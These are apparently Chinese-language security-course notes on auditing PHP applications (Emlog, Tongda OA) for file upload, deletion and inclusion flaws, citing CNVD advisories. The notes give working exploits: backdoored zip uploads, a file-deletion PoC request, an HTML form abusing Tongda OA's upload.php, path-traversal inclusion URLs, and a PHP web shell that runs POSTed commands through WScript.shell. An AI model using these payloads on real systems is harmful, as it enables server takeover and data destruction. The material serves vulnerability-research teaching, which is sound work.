知识点:
1、PHP审计-原生态开发-文件安全&上传删除
2、PHP审计-原生态开发-文件安全&包含读取
3、PHP审计-原生态开发-代码解密&文件监控
文件安全挖掘点:1、脚本文件名2、应用功能点3、操作关键字 文件上传,文件下载(读取),文件包含,文件删除等一、演示案例-PHP审计-原生开发-文件上传&文件删除-Emlog
文件上传-CNVD-2023-74536
https://www.cnvd.org.cn/flaw/show/CNVD-2023-74536
搜索函数关键字或应用关键字:
流程:搜安装或上传等->template.php->upload_zip->emUnZip 流程:搜$_FILES->template.php->upload_zip->emUnZip
1、压缩默认模版目录
2、压缩一个带后门模版
3、上传带后门模版压缩包
文件上传-CNVD-2023-74535
https://www.cnvd.org.cn/flaw/show/CNVD-2023-74535
流程:搜$_FILES->plugin.php->upload_zip->emUnZip 流程:搜安装或上传等->plugin.php->upload_zip->emUnZip1、压缩默认插件目录2、压缩一个带后门插件3、上传带后门插件压缩包文件删除-CNVD-2021-41633
https://www.cnvd.org.cn/flaw/show/CNVD-2021-41633
流程:搜unlink->data.php->action=dell_all_bak->bak[]poc URL:/admin/data.php?action=dell_all_bak POST:bak[1]=1.txt二、演示案例-PHP审计-原生开发-文件上传&文件包含-通达OA
安装
源码加密问题
观察加密特征
网上找资料
文件上传
流程:找文件名->绕验证P->DEST_UID,UPLOAD_MOD->构ATTACHMENT 文件上传(文件名称):/webroot/ispirit/im/upload.php1、设置P参数不为02、设置DEST_UID参数为13、设置UPLOAD_MODE参数为1,2,34、设置上传文件参数名为ATTACHMENT<html><body><formaction="http://127.0.0.1/ispirit/im/upload.php"method="post"enctype="multipart/form-data"><inputtype="text"name="P"value=1></input><inputtype="text"name="UPLOAD_MODE"value=1></input><inputtype="text"name="DEST_UID"value=1></input><inputtype="file"name="ATTACHMENT"></input><inputtype="submit"></input></body></html>但是有个问题就是上传的文件到哪去了,这里就需要用到文件监控。
文件监控:file-jiankong.py
监控上传的文件到什么地方
文件包含
流程:搜include_once->gateway.php->$url->$key->$json文件包含(include_once):/ispirit/interface/gateway.phppoc1: /ispirit/interface/gateway.php?json={}&url=/general/../../attach/im/2310/1600449966.1.txt poc2: /ispirit/interface/gateway.php?json={}&url=/ispirit/../../attach/im/2310/1600449966.1.txt poc3: /ispirit/interface/gateway.php?json={}&url=/module/../../attach/im/2310/1600449966.1.txt<?php$command=$_POST['cmd'];$wsh=new COM('WScript.shell');$exec=$wsh->exec("cmd /c ".$command);$stdout=$exec->StdOut();$stroutput=$stdout->ReadAll();echo$stroutput;?>